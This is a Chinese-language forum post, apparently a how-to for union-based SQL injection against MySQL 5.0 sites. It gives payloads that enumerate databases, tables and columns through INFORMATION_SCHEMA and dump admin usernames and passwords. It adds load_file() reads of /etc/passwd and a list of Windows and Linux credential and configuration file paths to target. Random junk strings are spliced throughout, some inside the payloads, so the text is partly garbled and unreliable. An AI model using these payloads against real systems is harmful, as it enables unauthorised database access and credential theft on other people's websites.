mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。

" \8 t/ D! u# s0 l; C) I% s

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
! |* p" p! v4 a9 q存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
- x) |$ A- X' W5 N/ h4 ~1.得到所有数据库名：
# l5 i+ t( ?; ]: x* u6 M|SCHEMATA ->存储数据库名的表
/ j  |1 c7 e7 p% s% ||—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
, F4 K2 M5 g+ }* p+ N& d|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
7 m, a3 A9 @  w. h% U|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
, h! G4 s& a& l5 \! q
#########################################################################
##
! j; j+ G0 M, a' J, a4 L; d4 M
0×001 获取系统信息:
* C  I: V3 e6 f, n) y5 |
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
# r# k7 ^$ ]/ l. v+ ^& @( q* P(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
( V7 k7 H% a- z9 b
/*
9 Y' I! N+ s9 z* @+ ~( K+ M: d
@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
# f5 t% V! X2 I0 p9 e! u0 n0x3c62723e 换行HEX值

*/
: g. L: v7 @4 D7 O7 u
* K9 r6 H3 O) \) W" Q######################################################################

0×002 获取表名

$ r. Z% s+ v# M6 T- Runion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
$ x. h+ |- z9 v. Z7 hinformation_schema.tables where table_schema=0x67617264656e /*
  H1 i# t) S$ W1 U* C
; A6 \9 G  K/ ~% _/*

# a# a" o% n- T3 t6 K) V( p0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

$ t3 D( ?7 f+ {1 e; k# G! G*/

######################################################################
5 b% h: q6 L6 p4 B; m3 Y! J
0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
! f/ Y1 C# ]  {: Z
5 S. U: D1 r: P0 B+ u2 N' M  \! z" w
" G2 T3 i* V% d. U, H2 u6 a2 Dtable_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
9 c3 t1 S5 [* i/ A- G3 c
0x61646d696e ->选择一个表

" E$ z6 `# C' _/ R$ R2 U0x67617264656e ->数据库名

3 [' i9 a3 s  i) M0 \  E3 j" p*/
- _* c6 \- a( A2 J; ?& w. _
#####################################################################

0×004 获取数据

5 S/ j4 s, C# S1 t6 e8 w& d0 D2 Y3 Qunion select 1,2,3
! i: q5 K1 C5 G/ A, x! Q) R! h" ^- D,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
( e3 |( p# t/ I7 R8 n
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
: q, S6 u% X+ G4 R(adpassword),6,7,8 from admin

) B- H" v, p3 z  R/*
$ j1 P- Q- V& E+ w) Y
0x3c62723e 换行符号HEX编码

5 Q% S6 W+ n) f; b+ p7 A  M4 Ogroup_concat 同时获得该字段所有数据

  j' G/ r. L7 P$ x* T- s*/
  q: i3 y. J: L& H1 J. J: n& F
$ t. _/ F+ B; l- o2 k1 n% I2 Q
8 i8 r7 ?; `" |( Z& u  s7 q
- {" P& y- W0 g4 a$ {4 L

顺便添加一些mysql注入时非常有用的一些东西

" k  f! d- B+ w+ M简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
2 U0 S3 U; o# Y% v; b- a
1:system_user() 系统用户名
2:user()        用户名
0 E7 g% D1 c6 i3:current_user()  当前用户名
) N1 y. G8 ^/ T, G: S4:session_user()连接数据库的用户名
6 l" I4 k% M+ z6 G/ D5 U6 ?5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
! ^  X9 }1 w7 N6 v, b+ I( L0 ]8@datadir     读取数据库路径
$ k' x7 h( ]+ x0 ?& L9@basedir    MYSQL 安装路径
" ~6 Q* |+ R$ {5 J: X8 R) N10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
  ~/ p3 W! S0 Mc:/boot.ini          //查看系统版本
9 C  E+ C- K: [" c9 W; N; |. vc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
8 ]. k/ x8 q+ V; b/ e! Q; W2 n7 G, \c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
) r& A' E# n2 J( q8 C0 R' Jc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
5 a; {; c4 u+ }; Y: C1 Q7 K% N/ nc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
* j9 M2 z* L8 @4 hc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
9 c4 n4 |( {! N* e9 [6 l% c& _2 O
2 o' E( {9 T) Q  B0 }
; M; x# c6 V; X* n; p" E$ A/ y2 l  gc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
. s2 J, [9 ^% x5 z! vd:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
5 G- V. i! h* ]& i, g' kc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
. p8 p1 D/ E) S  T, }  N; r/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
! ]+ P) R- O% u; V4 F0 m/usr/local/apache2/conf/httpd.conf
/ f. [0 J* u2 f" i1 l/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
# N, ?- T/ c0 B' w: S3 K/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
, G! k& ~: U/ [' V& O/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
2 S: G  `1 r0 ]& D# Y2 s/etc/issue
6 M6 E  l9 a- A# I# ^  K3 d/etc/issue.net
: j9 a* b* U$ K: M) s/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
  l  N% q, M* k- z+ c/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
$ G/ Q& _1 J8 P4 h- _% |8 @/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
% u% D7 a( Y8 ~+ q0 l$ f+ m/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
4 x! x* E% P0 f0 \; J5 M7 E/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
- f: z" ^, v& }/ p& `/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
2 W/ h9 _6 D5 W6 F: b/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  D, J; d( ]* L. F6 J: y/ {/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
6 E" ^6 L: E3 u, t/etc/sysconfig/iptables 查看防火墙策略
/ J* G" ^  B$ ~0 U2 p# u% [. Kload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
* A2 h3 Q# H( j. P% H; W7 j9 @replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
1 T( S! A  Q- S5 }- ~  p( t* P上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
! Y+ b8 J& I; B4 M9 f" c. j8 f
5 Y6 Y' I8 E8 z5 N4 f' G3 y8 A